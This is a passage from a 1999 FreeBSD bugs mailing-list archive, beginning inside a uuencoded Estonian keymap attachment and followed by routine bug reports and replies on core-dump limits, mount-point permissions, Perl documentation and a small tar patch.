M"`@("`G8B<@("`@)T(G("`@('-T M>"`@("!S='@@("`@($,*("`P-#D@("`G;B<@("`@)TXG("`@('-O("`@("!S M;R`@("`@)VXG("`@("=.)R`@("!S;R`@("`@3`Q(&9K97DQ,R!F:V5Y,C4@9FME>3,W M('-C3(V(&9K97DS."!S8W(P,B`@3$U(&9K97DR-R!F:V5Y,SD@ M3`T M(&9K97DQ-B!F:V5Y,C@@9FME>30P('-C3(Y(&9K97DT,2!S M8W(P-2`@3$X(&9K97DS,"!F:V5Y-#(@3`W(&9K97DQ.2!F:V5Y,S$@9FME>30S('-C M3,R(&9K97DT-"!S8W(P."`@3(Q(&9K97DS,R!F:V5Y-#4@3$P(&9K M97DR,B!F:V5Y,S0@9FME>30V('-C30Y("34R("34U("34X("3,U(&9K97DT-R!S8W(Q,2`@3(T(&9K97DS M-B!F:V5Y-#@@30Y(&9K97DT.2!F M:V5Y-#D@9FME>30Y(&9K97DT.2!F:V5Y-#D@9FME>30Y("!/"B`@,#DU("`@ M9FME>34P(&9K97DU,"!F:V5Y-3`@9FME>34P(&9K97DU,"!F:V5Y-3`@9FME M>34P(&9K97DU,"`@3PH@(#`Y-B`@(&9K97DU,2!F:V5Y-3$@9FME>34Q(&9K M97DU,2!F:V5Y-3$@9FME>34Q(&9K97DU,2!F:V5Y-3$@($\*("`P.3<@("!F M:V5Y-3,@9FME>34S(&9K97DU,R!F:V5Y-3,@9FME>34S(&9K97DU,R!F:V5Y M-3,@9FME>34S("!/"B`@,#DX("`@9FME>34U(&9K97DU-2!F:V5Y-34@9FME M>34U(&9K97DU-2!F:V5Y-34@9FME>34U(&9K97DU-2`@3PH@(#`Y.2`@(&9K M97DU-R!F:V5Y-3<@9FME>34W(&9K97DU-R!F:V5Y-3<@9FME>34W(&9K97DU M-R!F:V5Y-3<@($\*("`Q,#`@("!F:V5Y-3@@9FME>34X(&9K97DU."!F:V5Y M-3@@9FME>34X(&9K97DU."!F:V5Y-3@@9FME>34X("!/"B`@,3`Q("`@9FME M>34Y(&9K97DU.2!F:V5Y-3D@9FME>34Y(&9K97DU.2!F:V5Y-3D@9FME>34Y M(&9K97DU.2`@3PH@(#$P,B`@(&9K97DV,"!F:V5Y-C`@9FME>38P(&9K97DV M,"!F:V5Y-C`@9FME>38P(&9K97DV,"!F:V5Y-C`@($\*("`Q,#,)9FME>38Q M(&9K97DV,2!F:V5Y-C$@9FME>38Q(&9K97DV,2!F:V5Y-C$@8F]O="`@(&9K M97DV,2`@3PH@(#$P-"`@('-L;V-K("!S879E38R(&9K97DV,B!F:V5Y-C(@9FME>38R(&9K97DV,B!F:V5Y-C(@9FME M>38R("!/"B`@,3`V("`@9FME>38S(&9K97DV,R!F:V5Y-C,@9FME>38S(&9K M97DV,R!F:V5Y-C,@9FME>38S(&9K97DV,R`@3PH@(#$P-R`@(&9K97DV-"!F M:V5Y-C0@9FME>38T(&9K97DV-"!F:V5Y-C0@9FME>38T(&9K97DV-"!F:V5Y M-C0@($\*("`Q,#@@("!N;W`@("`@;F]P("`@(&YO<"`@("!N;W`@("`@;F]P M("`@(&YO<"`@("!N;W`@("`@;F]P("`@("!/"@`````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M`````'-H87)E+W-YB<@("`@)UHG("`@('-U8B`@("!S=6(@("`@,3@T("`@(#$X,"`@ M("!S=6(@("`@"`@("`G8R<@("`@)T,G("`@ M(&5T>"`@("!E='@@("`@($,*("`P-#<@("`G=B<@("`@)U8G("`@('-Y;B`@ M("!S>6X@("`@)W8G("`@("=6)R`@("!S>6X@("`@"`@("`@0PH@(#`T.2`@("=N)R`@("`G3B<@("`@3$S(&9K97DR-2!F:V5Y M,S<@3`R(&9K97DQ-"!F:V5Y,C8@9FME>3,X('-C3(W(&9K97DS M.2!S8W(P,R`@3$V(&9K97DR."!F:V5Y-#`@3`U(&9K97DQ-R!F:V5Y,CD@9FME>30Q M('-C3,P(&9K97DT,B!S8W(P-B`@3$Y(&9K97DS,2!F:V5Y-#,@ M3`X M(&9K97DR,"!F:V5Y,S(@9FME>30T('-C3,S(&9K97DT-2!S M8W(P.2`@3(R(&9K97DS-"!F:V5Y-#8@34P("34S("34V("34Y("3$Q(&9K97DR,R!F:V5Y,S4@9FME>30W('-C3,V(&9K97DT."!S8W(Q,B`@30Y M(&9K97DT.2!F:V5Y-#D@9FME>30Y(&9K97DT.2!F:V5Y-#D@($\*("`P.34@ M("!F:V5Y-3`@9FME>34P(&9K97DU,"!F:V5Y-3`@9FME>34P(&9K97DU,"!F M:V5Y-3`@9FME>34P("!/"B`@,#DV("`@9FME>34Q(&9K97DU,2!F:V5Y-3$@ M9FME>34Q(&9K97DU,2!F:V5Y-3$@9FME>34Q(&9K97DU,2`@3PH@(#`Y-R`@ M(&9K97DU,R!F:V5Y-3,@9FME>34S(&9K97DU,R!F:V5Y-3,@9FME>34S(&9K M97DU,R!F:V5Y-3,@($\*("`P.3@@("!F:V5Y-34@9FME>34U(&9K97DU-2!F M:V5Y-34@9FME>34U(&9K97DU-2!F:V5Y-34@9FME>34U("!/"B`@,#DY("`@ M9FME>34W(&9K97DU-R!F:V5Y-3<@9FME>34W(&9K97DU-R!F:V5Y-3<@9FME M>34W(&9K97DU-R`@3PH@(#$P,"`@(&9K97DU."!F:V5Y-3@@9FME>34X(&9K M97DU."!F:V5Y-3@@9FME>34X(&9K97DU."!F:V5Y-3@@($\*("`Q,#$@("!F M:V5Y-3D@9FME>34Y(&9K97DU.2!F:V5Y-3D@9FME>34Y(&9K97DU.2!F:V5Y M-3D@9FME>34Y("!/"B`@,3`R("`@9FME>38P(&9K97DV,"!F:V5Y-C`@9FME M>38P(&9K97DV,"!F:V5Y-C`@9FME>38P(&9K97DV,"`@3PH@(#$P,PEF:V5Y M-C$@9FME>38Q(&9K97DV,2!F:V5Y-C$@9FME>38Q(&9K97DV,2!B;V]T("`@ M9FME>38Q("!/"B`@,3`T("`@38R(&9K97DV,B!F:V5Y-C(@9FME>38R(&9K97DV,B!F M:V5Y-C(@($\*("`Q,#8@("!F:V5Y-C,@9FME>38S(&9K97DV,R!F:V5Y-C,@ M9FME>38S(&9K97DV,R!F:V5Y-C,@9FME>38S("!/"B`@,3`W("`@9FME>38T M(&9K97DV-"!F:V5Y-C0@9FME>38T(&9K97DV-"!F:V5Y-C0@9FME>38T(&9K M97DV-"`@3PH@(#$P."`@(&YO<"`@("!N;W`@("`@;F]P("`@(&YO<"`@("!N M;W`@("`@;F]P("`@(&YO<"`@("!N;W`@("`@($\*```````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` >Release-Note: >Audit-Trail: >Unformatted: >```````````````````````````````````````` ` end To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Nov 2 1:48:34 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id E209E14E65; Tue, 2 Nov 1999 01:48:30 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id BAA89794; Tue, 2 Nov 1999 01:48:30 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Date: Tue, 2 Nov 1999 01:48:30 -0800 (PST) From: Message-Id: <199911020948.BAA89794@freefall.freebsd.org> To: sheldonh@FreeBSD.org, freebsd-bugs@FreeBSD.org, markm@FreeBSD.org Subject: Re: gnu/14649: Perl "tutorials" missing from documentation Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Perl "tutorials" missing from documentation Responsible-Changed-From-To: freebsd-bugs->markm Responsible-Changed-By: sheldonh Responsible-Changed-When: Tue Nov 2 01:47:59 PST 1999 Responsible-Changed-Why: Mark is Mr Perl, although I'm happy to commit this if he feels it's trivial. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Nov 2 2:30: 5 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id AE4A7153A7 for ; Tue, 2 Nov 1999 02:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA93562; Tue, 2 Nov 1999 02:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Tue, 2 Nov 1999 02:30:02 -0800 (PST) Message-Id: <199911021030.CAA93562@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Alexey Zelkin Subject: Re: conf/14658: Estonian keymaps Reply-To: Alexey Zelkin Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR conf/14658; it has been noted by GNATS. From: Alexey Zelkin To: priit@cc.ttu.ee Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: conf/14658: Estonian keymaps Date: Tue, 2 Nov 1999 13:14:46 +0300 hi, On Tue, Nov 02, 1999 at 11:20:41AM +0200, Priit Järv wrote: > >Number: 14658 > >Category: conf > >Synopsis: Estonian keymaps not yet included in FreeBSD distribution > There are no estonian keymaps included yet with the FreeBSD > distribution. However, there are already many estonian FreeBSD users, > who might be interested in such a feature. Only keymaps ? And what about fonts/locale/timedef/colldef ? > begin 644 est-keymaps.tar > M M```````````````````````````````````````````````````````````` Just a note -- what about gzipping you tarballs before sending it ? -- /* Alexey Zelkin && phantom@cris.net */ /* Tavric National University && phantom@crimea.edu */ /* http://www.ccssu.crimea.ua/~phantom && phantom@FreeBSD.org */ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Nov 2 2:40:17 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 3F2C414FDC for ; Tue, 2 Nov 1999 02:40:00 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA94434; Tue, 2 Nov 1999 02:40:00 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 13E6414FBC; Tue, 2 Nov 1999 02:34:14 -0800 (PST) Message-Id: <19991102103414.13E6414FBC@hub.freebsd.org> Date: Tue, 2 Nov 1999 02:34:14 -0800 (PST) From: Higashi.Hiroyuki@ss.anritsu.co.jp To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: kern/14660: limit coredumpsize 0, but dumps Zero Size Core File Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14660 >Category: kern >Synopsis: limit coredumpsize 0, but dumps Zero Size Core File >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Nov 2 02:40:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: HIGASHI Hiroyuki >Release: FreeBSD-3.3R i386 >Organization: ANRITSU CORPORATION >Environment: 3.3-RELEASE FreeBSD 3.3-RELEASE >Description: I set "limit coredumpsize 0". But kernel dumps "Zero Size Core File". >How-To-Repeat: Test Program source is below.(This file name is "foo.c".) ----- main(void) { int a; a = 1/0; } ----- Compile this source program. And execute it. ----- % limit coredumpsize 0 % cc foo.c % a.out Floating point exception % ls -l a.out* -rwxrwxr-x 1 higashi TR 3093 Nov 2 19:13 a.out -rw------- 1 higashi TR 0 Nov 2 19:13 a.out.core ----- Other version of FreeBSD DOSE NOT DUMP core file. >Fix: at kern_sig.c of coredump() before call "p->p_sysent->sv_coredump(p, vp, limit)" check "limit" size Ex. ----- 1393 error = (limit & p->p_sysent->sv_coredump) ? 1394 p->p_sysent->sv_coredump(p, vp, limit) : 1395 ENOSYS; ----- >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Nov 2 2:48:55 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id DB03E14E65; Tue, 2 Nov 1999 02:48:51 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA95364; Tue, 2 Nov 1999 02:48:51 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Date: Tue, 2 Nov 1999 02:48:51 -0800 (PST) From: Message-Id: <199911021048.CAA95364@freefall.freebsd.org> To: Higashi.Hiroyuki@ss.anritsu.co.jp, sheldonh@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/14660: limit coredumpsize 0, but dumps Zero Size Core File Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: limit coredumpsize 0, but dumps Zero Size Core File State-Changed-From-To: open->closed State-Changed-By: sheldonh State-Changed-When: Tue Nov 2 02:48:28 PST 1999 State-Changed-Why: Duplicate of PR 14540. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Nov 2 3:13: 0 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from ns.anritsu.co.jp (ns.anritsu.co.jp [133.236.48.2]) by hub.freebsd.org (Postfix) with ESMTP id CBD6614E45; Tue, 2 Nov 1999 03:12:48 -0800 (PST) (envelope-from Higashi.Hiroyuki@ss.anritsu.co.jp) Received: from gatekeeper.noc.anritsu.co.jp (root@gatekeeper.noc.anritsu.co.jp [133.236.19.3]) by ns.anritsu.co.jp (8.9.3+3.1W/3.7W) with ESMTP id UAA23401; Tue, 2 Nov 1999 20:12:40 +0900 (JST) (envelope-from Higashi.Hiroyuki@ss.anritsu.co.jp) From: Higashi.Hiroyuki@ss.anritsu.co.jp Received: from mail0.cr.anritsu.co.jp (mail0.cr.anritsu.co.jp [172.16.32.22]) by gatekeeper.noc.anritsu.co.jp (8.8.8+2.7Wbeta7/3.5Wpl7) with ESMTP id UAA18182; Tue, 2 Nov 1999 20:12:39 +0900 (JST) Received: from ews2.ca.anritsu.co.jp ([172.16.36.44]) by mail0.cr.anritsu.co.jp (Netscape Messaging Server 3.54) with SMTP id AAA1A6A; Tue, 2 Nov 1999 20:14:31 +0900 To: sheldonh@FreeBSD.org Cc: freebsd-bugs@FreeBSD.org, Higashi.Hiroyuki@ss.anritsu.co.jp Subject: Sorry [Re: kern/14660: limit coredumpsize 0, but dumps Zero Size Core File] In-Reply-To: Your message of "Tue, 2 Nov 1999 02:48:51 -0800 (PST)". <199911021048.CAA95364@freefall.freebsd.org> Date: Tue, 2 Nov 99 20:08:10 JST X-Mailer: mnews [version 1.21PL4] 1998-06/01(Mon) Message-ID: <77280043597.AAA1A6A@mail0.cr.anritsu.co.jp> Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello, This is Higashi Mr. sheldonh@FreeBSD.org wrotes sheldonh>Synopsis: limit coredumpsize 0, but dumps Zero Size Core File sheldonh> sheldonh>State-Changed-From-To: open->closed sheldonh>State-Changed-By: sheldonh sheldonh>State-Changed-When: Tue Nov 2 02:48:28 PST 1999 sheldonh>State-Changed-Why: sheldonh>Duplicate of PR 14540. Sorry, I didn't check it. And more, my [kern_sig.c] sample code does not work. Sorry, too. I guess, some thing wrong at function table of ----- p->p_sysent->sv_coredump() ----- code. But, my skill is too poor to solve this problem. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Nov 2 3:21: 2 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from axl.noc.iafrica.com (axl.noc.iafrica.com [196.31.1.175]) by hub.freebsd.org (Postfix) with ESMTP id 5BA0F14F6D for ; Tue, 2 Nov 1999 03:20:46 -0800 (PST) (envelope-from sheldonh@axl.noc.iafrica.com) Received: from sheldonh (helo=axl.noc.iafrica.com) by axl.noc.iafrica.com with local-esmtp (Exim 3.040 #1) id 11ibzH-0001Pd-00; Tue, 02 Nov 1999 13:20:27 +0200 From: Sheldon Hearn To: Higashi.Hiroyuki@ss.anritsu.co.jp Cc: freebsd-bugs@FreeBSD.org Subject: Re: Sorry [Re: kern/14660: limit coredumpsize 0, but dumps Zero Size Core File] In-reply-to: Your message of "Tue, 02 Nov 1999 20:08:10 +0200." <77280043597.AAA1A6A@mail0.cr.anritsu.co.jp> Date: Tue, 02 Nov 1999 13:20:27 +0200 Message-ID: <5432.941541627@axl.noc.iafrica.com> Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 02 Nov 1999 20:08:10 +0200, Higashi.Hiroyuki@ss.anritsu.co.jp wrote: > Sorry, I didn't check it. No worries, it happens all the time. > But, my skill is too poor to solve this problem. Mine too. I'm sure someone competent will take a look shortly. :-) Later, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Nov 2 4:20: 8 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 14FC114DFC for ; Tue, 2 Nov 1999 04:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id EAA04392; Tue, 2 Nov 1999 04:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Tue, 2 Nov 1999 04:20:02 -0800 (PST) Message-Id: <199911021220.EAA04392@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Lars =?iso-8859-1?Q?K=F6ller?= Subject: Re: kern/14322: mount respects permissions of underlying directoy!! Reply-To: Lars =?iso-8859-1?Q?K=F6ller?= Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/14322; it has been noted by GNATS. From: Lars =?iso-8859-1?Q?K=F6ller?= To: Steve Brown Cc: freebsd-gnats-submit@freebsd.org, lkoeller@cc.fh-lippe.de Subject: Re: kern/14322: mount respects permissions of underlying directoy!! Date: Tue, 02 Nov 1999 13:12:15 +0100 In reply to Steve Brown who wrote: > The described condition is rather a normal happening; for over ten years I > have always made sure my mount point and the mounted directory share > permissions (UID and mode) in various flavours of UNIX -- I've seen this > happen on Sun computers and ever since I have matched mounted and mount > point permissions. > > Not saying it isn't a bug, but it sure can make you scratch your head the > first time you see it :^) A little test on our HP Cluster (HPUX 10.20) shows the expeted behavior, only the permissions of the mounted directory are valid. for the accessrights. The underlying directory perms aren't valid anymore after the mount. Does anybody know if this behavior has changed in some older FreeBSD version, cause I remember a case where the permissions only of the mounted directory are respected! Is the default behavior mentioned in any manpage? I didn't found one! Regards Lars -- Lars Köller | Raum : V0-318 (Tel: 4964) UNIX Systemad- | E-Mail : Lars.Koeller@Uni-Bielefeld.DE ministration | PGP-Key: http://www.pgp.net/pgpnet/www-key.html ----------- FreeBSD, what else? ---- http://www.de.freebsd.org --------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Nov 2 8: 0: 1 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from ns.mt.sri.com (ns.mt.sri.com [206.127.79.91]) by hub.freebsd.org (Postfix) with ESMTP id B1BB614FC7 for ; Tue, 2 Nov 1999 07:59:40 -0800 (PST) (envelope-from nate@mt.sri.com) Received: from mt.sri.com (rocky.mt.sri.com [206.127.76.100]) by ns.mt.sri.com (8.9.3/8.9.3) with SMTP id IAA29474; Tue, 2 Nov 1999 08:59:20 -0700 (MST) (envelope-from nate@rocky.mt.sri.com) Received: by mt.sri.com (SMI-8.6/SMI-SVR4) id IAA23728; Tue, 2 Nov 1999 08:59:20 -0700 Date: Tue, 2 Nov 1999 08:59:20 -0700 Message-Id: <199911021559.IAA23728@mt.sri.com> From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: Sheldon Hearn Cc: Higashi.Hiroyuki@ss.anritsu.co.jp, freebsd-bugs@FreeBSD.ORG Subject: Re: Sorry [Re: kern/14660: limit coredumpsize 0, but dumps Zero Size Core File] In-Reply-To: <5432.941541627@axl.noc.iafrica.com> References: <77280043597.AAA1A6A@mail0.cr.anritsu.co.jp> <5432.941541627@axl.noc.iafrica.com> X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid Reply-To: nate@mt.sri.com (Nate Williams) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > Sorry, I didn't check it. > > No worries, it happens all the time. > > > But, my skill is too poor to solve this problem. > > Mine too. I'm sure someone competent will take a look shortly. :-) I think Sean just fixed it this last weekend. Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Nov 2 11: 0: 5 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id EEF9414F10 for ; Tue, 2 Nov 1999 11:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA90889; Tue, 2 Nov 1999 11:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from thoth.mch.sni.de (thoth.mch.sni.de [192.35.17.2]) by hub.freebsd.org (Postfix) with ESMTP id 613D514CE8 for ; Tue, 2 Nov 1999 10:49:57 -0800 (PST) (envelope-from andre.albsmeier@mchp.siemens.de) Received: from mail2.siemens.de (mail2.siemens.de [139.25.208.11]) by thoth.mch.sni.de (8.9.3/8.9.3) with ESMTP id TAA26879 for ; Tue, 2 Nov 1999 19:49:55 +0100 (MET) Received: from curry.mchp.siemens.de (curry.mchp.siemens.de [139.25.42.7]) by mail2.siemens.de (8.9.3/8.9.3) with ESMTP id TAA06838 for ; Tue, 2 Nov 1999 19:49:55 +0100 (MET) Received: (from daemon@localhost) by curry.mchp.siemens.de (8.9.3/8.9.3) id TAA28329 for ; Tue, 2 Nov 1999 19:49:54 +0100 (CET) Message-Id: <199911021849.TAA28716@internal> Date: Tue, 2 Nov 1999 19:49:53 +0100 (CET) From: Andre Albsmeier To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: gnu/14664: tar checks for volno-file even if it shouldn't Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14664 >Category: gnu >Synopsis: tar checks for volno-file even if it shouldn't >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Nov 2 11:00:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Andre Albsmeier >Release: FreeBSD 3.3-STABLE i386 >Organization: >Environment: Probably all FreeBSD versions, patch ist for -STABLE >Description: When using tar with the -F option but without --volno-file, the following output appears after the first volume is full: root@server:/dump>tar -c -F /dump/volchange -L 10 -f try.tar usr tar: (null) : Bad address This is because the code to modify the volno-file is called even if there hasn't been one specified. >How-To-Repeat: See above. >Fix: The fix does the same thing as being done elsewhere when volno-file is accessed: Do it only if the user specified --volno-file. --- gnu/usr.bin/tar/buffer.c.ORI Tue Nov 2 19:37:05 1999 +++ gnu/usr.bin/tar/buffer.c Tue Nov 2 19:41:07 1999 @@ -1434,7 +1434,8 @@ /* We have to prompt from now on. */ if (f_run_script_at_end) { - closeout_volume_number (); + if (f_volno_file) + closeout_volume_number (); system (info_script); } else >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Nov 2 15:30: 8 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C7473154B8 for ; Tue, 2 Nov 1999 15:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA13501; Tue, 2 Nov 1999 15:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 30E5B15301; Tue, 2 Nov 1999 15:28:30 -0800 (PST) Message-Id: <19991102232830.30E5B15301@hub.freebsd.org> Date: Tue, 2 Nov 1999 15:28:30 